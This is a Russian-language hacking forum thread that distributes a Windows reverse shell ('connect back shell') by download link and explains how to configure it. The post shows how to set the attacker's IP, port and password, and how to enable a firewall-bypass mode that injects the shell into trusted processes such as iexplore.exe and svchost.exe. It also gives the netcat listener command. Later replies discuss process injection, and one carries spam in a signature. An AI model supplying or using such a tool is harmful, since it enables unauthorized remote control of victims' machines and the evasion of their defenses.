Security Teams



Damage Lab ::: .:[KZ TeaM]:. ::: X-Hack Team ::: :::
  Ответ в темуСоздание новой темы

> drmist's Connect Back Shell 0.6, (c) drmist
drmist
Дата 1.03.2006 - 21:42
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


https://www.stnc.ru/ftpdrmist/sources/cbs.0.6.rar

В архиве Вы найдете исходники connect back shell'a под Windows NT (имеется ввиду NT, 2k, 2k3server, XP).
Программа может компилироваться двумя образами
#define FUCK_FIREWALL true
и
////// #define FUCK_FIREWALL true

wink.gif
в первом случае шелл будет пытаться инжектироваться в доверенные процессы (определяет их по имени), во втором - коннектится к удаленному серверу на прямую. На удаленном сервере с помощью netcat'a должен быть открыт соответсвующий порт (default 3003). Кто не помнит - делается это командой netcat -l -p 3003.

Настраивается шелл следующим образом:
Лезим в исходники.

cbs.cpp

char IpAddress[] = "127.0.0.1";
#define PORT 3003


куда коннектимся - адерс и порт.

char Password[] = "qwerty";
#define PASS_LENGTH 6


пароль и его длина

#define FUCK_FIREWALL true

если закоментированно - обход файервола не используется.

FuckFirewall.cpp

#define INJECT_NAMES_COUNT 5
число имен доверенных процессов

char iexplore[] = "iexplore.exe";
char opera[] = "opera.exe";
char mozilla[] = "mozilla.exe";
char firefox[] = "firefox.exe";
char svchost[] = "svchost.exe";


имена доверенных процессов

char* InjectNames[INJECT_NAMES_COUNT] = { iexplore, opera, mozilla, firefox, svchost };

массив имен доверенных процессов.
Надеюсь тут пояснений не надо - любой ребенок справится.

Для компиляции Вам потребуется Microsoft Visual C++. Я использовал популярную версию 6.0 smile.gif. Программа весит 2.5 Кб (если не использовать обход файервола - 1.5 Кб).

А теперь главный вопрос, который меня беспокоит - кому нужно это барахло? )))


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
mulder
Дата 2.03.2006 - 12:02
Цитировать сообщение
Offline



.:in root we trust:.
*****

Профиль
Группа: -vip-
Сообщений: 1181
Пользователь №: 1151
Регистрация: 9.08.2005



Рейтинг:
(70%) XXXX-


Нужен не сам шелл а комментарии его исходного кода это будет полезней в теме типа ! "Инжектирование произвольного кода в системные процессы"
PM
Top
drmist
Дата 2.03.2006 - 16:34
Цитировать сообщение
Offline



Professional
*****

Профиль
Группа: -users-
Сообщений: 1165
Пользователь №: 222
Регистрация: 14.04.2005



Рейтинг:
(0%) -----


Дык про это уже давно и Рихтер писал и тот же Ms-Rem - функция инжектирования вобще из его статьи выдрана - разве что на Си перевел ((


--------------------
Когда нельзя еще больше хочется...
PMСайт пользователя
Top
mulder
Дата 2.03.2006 - 18:11
Цитировать сообщение
Offline



.:in root we trust:.
*****

Профиль
Группа: -vip-
Сообщений: 1181
Пользователь №: 1151
Регистрация: 9.08.2005



Рейтинг:
(70%) XXXX-


Да я то в курсе, а народу то надо толковым языком обьяснить что там и к чему и как работает и толково и доходчиво Рихтер же не для "сисадминов" писал, что-бы народ не тупо компилил а понимал принципы работы того что он компилит !
PM
Top
nameless
Дата 2.03.2006 - 20:16
Цитировать сообщение
Offline



.:Тень:.
******

Профиль
Группа: -experts-
Сообщений: 1745
Пользователь №: 18
Регистрация: 19.02.2005



Рейтинг:
(90%) XXXXX


Не, думаю коментов не нужно. Код просмотрел бегло - нормальный код, толково написан.


--------------------
Мы расправим крылья
PM
Top
12usver12
Дата 17.02.2009 - 14:20
Цитировать сообщение




Unregistered












ребята можете обновить ссылку ?
Top
nameless
Дата 17.02.2009 - 19:16
Цитировать сообщение
Offline



.:Тень:.
******

Профиль
Группа: -experts-
Сообщений: 1745
Пользователь №: 18
Регистрация: 19.02.2005



Рейтинг:
(90%) XXXXX


Цитата
ребята можете обновить ссылку ?

Думаю нет.


--------------------
Мы расправим крылья
PM
Top
12usver12
Дата 18.02.2009 - 17:07
Цитировать сообщение




Unregistered












жалко , хотел был посмотреть на это творение
Top
murgy
Дата 3.03.2010 - 18:03
Цитировать сообщение
Offline



Junior
*

Профиль
Группа: -users-
Сообщений: 6
Пользователь №: 6913
Регистрация: 3.03.2010



Рейтинг:
(0%) -----


ценная информация


--------------------
Предлагаем вашему вниманию минераловатные https://www.complect.su - сендвич - панели по оптовым ценам в розницу
PMПисьмо на e-mail пользователюСайт пользователяIntegrity Messenger IMICQAOLYahooMSN
Top

Опции темы Ответ в темуСоздание новой темы